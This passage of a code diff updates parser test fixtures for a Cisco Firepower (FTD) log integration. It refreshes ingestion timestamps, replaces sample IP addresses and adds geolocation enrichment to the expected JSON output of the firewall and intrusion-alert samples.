siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, @@ -658,7 +658,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441105300Z", + "ingested": "2021-12-09T13:35:07.581675100Z", "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00", "code": "" }, @@ -695,7 +695,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441107Z", + "ingested": "2021-12-09T13:35:07.581679900Z", "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00", "code": "" }, @@ -732,7 +732,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441108800Z", + "ingested": "2021-12-09T13:35:07.581685800Z", "original": "\u003c14\u003eAug 14 2019 14:01:13 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, @@ -769,7 +769,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441110500Z", + "ingested": "2021-12-09T13:35:07.581690800Z", "original": "\u003c14\u003eAug 14 2019 14:01:20 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, @@ -806,7 +806,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441112200Z", + "ingested": "2021-12-09T13:35:07.581694800Z", "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, @@ -843,7 +843,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441114Z", + "ingested": "2021-12-09T13:35:07.581699100Z", "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Global Configuration Generation\u0000x0a\u0000x00", "code": "" }, @@ -880,7 +880,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441115900Z", + "ingested": "2021-12-09T13:35:07.581702900Z", "original": "\u003c14\u003eAug 14 2019 14:01:35 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, @@ -917,7 +917,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441117700Z", + "ingested": "2021-12-09T13:35:07.581707700Z", "original": "\u003c14\u003eAug 14 2019 14:01:36 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Device Configuration for siem-ftd\u0000x0a\u0000x00", "code": "" }, @@ -954,7 +954,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441119400Z", + "ingested": "2021-12-09T13:35:07.581713400Z", "original": "\u003c14\u003eAug 14 2019 14:01:55 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00", "code": "" }, @@ -991,7 +991,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441121100Z", + "ingested": "2021-12-09T13:35:07.581719Z", "original": "\u003c14\u003eAug 14 2019 14:01:56 sfdccsm: siem-management: admin@localhost, Task Queue, Policy Deployment to siem-ftd - SUCCESS\u0000x0a\u0000x00", "code": "" }, @@ -1028,7 +1028,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441122800Z", + "ingested": "2021-12-09T13:35:07.581724600Z", "original": "\u003c14\u003eAug 14 2019 14:01:57 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, @@ -1065,7 +1065,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441124600Z", + "ingested": "2021-12-09T13:35:07.581730100Z", "original": "\u003c14\u003eAug 14 2019 14:02:03 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00", "code": "" }, @@ -1102,7 +1102,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441126300Z", + "ingested": "2021-12-09T13:35:07.581735800Z", "original": "\u003c14\u003eAug 14 2019 14:02:11 index.cgi: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Audit, Page View\u0000x0a\u0000x00", "code": "" }, @@ -1139,7 +1139,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441128100Z", + "ingested": "2021-12-09T13:35:07.581757800Z", "original": "\u003c14\u003eAug 14 2019 14:02:19 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00", "code": "" }, @@ -1176,7 +1176,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441146300Z", + "ingested": "2021-12-09T13:35:07.581763300Z", "original": "\u003c14\u003eAug 14 2019 14:02:31 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": "" }, @@ -1213,7 +1213,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441148900Z", + "ingested": "2021-12-09T13:35:07.581768600Z", "original": "\u003c14\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Local System Configuration, Save Local System Configuration\u0000x0a\u0000x00", "code": "" }, @@ -1251,7 +1251,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:21:59.441150700Z", + "ingested": "2021-12-09T13:35:07.581774Z", "original": "\u003c14.2\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Audit Log Settings \u003e Modified: Send Audit Log to Syslog enabled \u003e Disabled", "code": "" }, diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json index a6f900e6a7f..6890093aabc 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json @@ -64,7 +64,7 @@ }, "event": { "severity": 0, - "ingested": "2021-09-07T12:22:00.700724200Z", + "ingested": "2021-12-09T13:35:09.413139500Z", "original": "2019-08-16T09:54:00Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55644, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -178,7 +178,7 @@ }, "event": { "severity": 0, - "ingested": "2021-09-07T12:22:00.700733Z", + "ingested": "2021-12-09T13:35:09.413148400Z", "original": "2019-08-16T09:57:02Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55868, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -290,7 +290,7 @@ }, "event": { "severity": 0, - "ingested": "2021-09-07T12:22:00.700735200Z", + "ingested": "2021-12-09T13:35:09.413154500Z", "original": "2019-08-16T10:04:44Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 39114, Protocol: tcp, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -400,7 +400,7 @@ }, "event": { "severity": 0, - "ingested": "2021-09-07T12:22:00.700737Z", + "ingested": "2021-12-09T13:35:09.413158900Z", "original": "2019-08-16T10:09:47Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 40740, Protocol: 6, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json index 69f205a30bb..afa0d5ae42a 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json @@ -48,7 +48,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:22:01.204979900Z", + "ingested": "2021-12-09T13:35:10.150747700Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: ApplicationProtocol: http, Client: webserver, DstIP: 10.8.12.47, SrcIP: 10.1.123.45, Message: Intrusion attempt", "code": "430001", "kind": "alert", @@ -109,7 +109,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:22:01.204988Z", + "ingested": "2021-12-09T13:35:10.150757400Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2).", "code": "430001", "kind": "alert", @@ -167,7 +167,7 @@ }, "event": { "severity": 7, - "ingested": "2021-09-07T12:22:01.204990200Z", + "ingested": "2021-12-09T13:35:10.150763900Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2), Empty: ,FileCount:, IngressZone:", "code": "430002", "kind": "event", @@ -243,7 +243,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-07T12:22:01.204992Z", + "ingested": "2021-12-09T13:35:10.150770Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: %ASA-3-430005 Message: This one has a type id, HTTPResponse: 404, Message: And two messages, SrcIP: 127.0.0.1, DstIP: 192.168.3.33, SrcPort: 512, DstPort: 64311", "code": "430005", "kind": "alert", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log index 2742be4b533..ca647162cfc 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log @@ -1,3 +1,3 @@ -<165>Oct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -> OUTSIDE/203.0.113.42(53) hit-cnt 1 first hit [0x16847359, 0x00000000] +<165>Oct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -> OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000] Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233 Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json index 8c3dccf6eb1..e61077af9b2 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json @@ -5,9 +5,27 @@ "level": "notification" }, "destination": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", + "location": { + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, + "address": "81.2.69.144", "port": 53, - "address": "203.0.113.42", - "ip": "203.0.113.42" + "ip": "81.2.69.144" }, "syslog": { "facility": { @@ -16,8 +34,8 @@ }, "source": { "port": 27218, - "address": "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244", - "domain": "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244" + "address": "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244", + "domain": "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244" }, "tags": [ "preserve_original_event" @@ -47,16 +65,16 @@ }, "related": { "hosts": [ - "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244" + "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244" ], "ip": [ - "203.0.113.42" + "81.2.69.144" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.493447500Z", - "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -\u003e OUTSIDE/203.0.113.42(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", + "ingested": "2021-12-09T13:35:10.569363700Z", + "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -120,7 +138,7 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:22:01.493459100Z", + "ingested": "2021-12-09T13:35:10.569371900Z", "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -202,7 +220,7 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.493461200Z", + "ingested": "2021-12-09T13:35:10.569377300Z", "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware", "code": "338204", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log index 09da866b488..663de2ad75a 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log @@ -1,71 +1,71 @@ -Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 by access-group "acl_dmz" [0xe3aab522, 0x0] -Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 type 3, code 0, by access-group "acl_dmz" [0xe3aab522, 0x0] -Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -> outside/192.0.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0] -Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -> outside/192.0.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0] -Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.0.2.130/12834 -Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.0.2.43/443 (192.0.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834) -Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.0.2.130/25882 -Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.0.2.222/53 (192.0.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882) -Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.0.2.130/45392 -Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.0.2.1/80 (192.0.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392) -Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.0.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140 -Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.0.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999 +Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group "acl_dmz" [0xe3aab522, 0x0] +Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group "acl_dmz" [0xe3aab522, 0x0] +Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -> outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0] +Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -> outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0] +Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834 +Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834) +Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882 +Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882) +Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392 +Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392) +Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140 +Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999 Jun 04 2011 21:59:52 FJSG2NRFW01 : %FTD-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233 -Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.0.0.130/10879 -Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.0.0.17/80 (192.0.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879) -Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.0.0.66/12981 to 10.1.2.60/53 due to DNS Query -Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879 +Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879) +Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query +Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] Apr 30 2013 09:22:48: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -> dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.0.2.66/137 to 10.1.2.42/137 on interface inside -Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.0.2.66/12981 to 10.1.5.60/53 due to DNS Query -Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] -Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] -Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -> outside/192.0.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside +Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query +Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] +Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] +Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -> outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] Dec 11 2018 08:01:24 127.0.0.1: 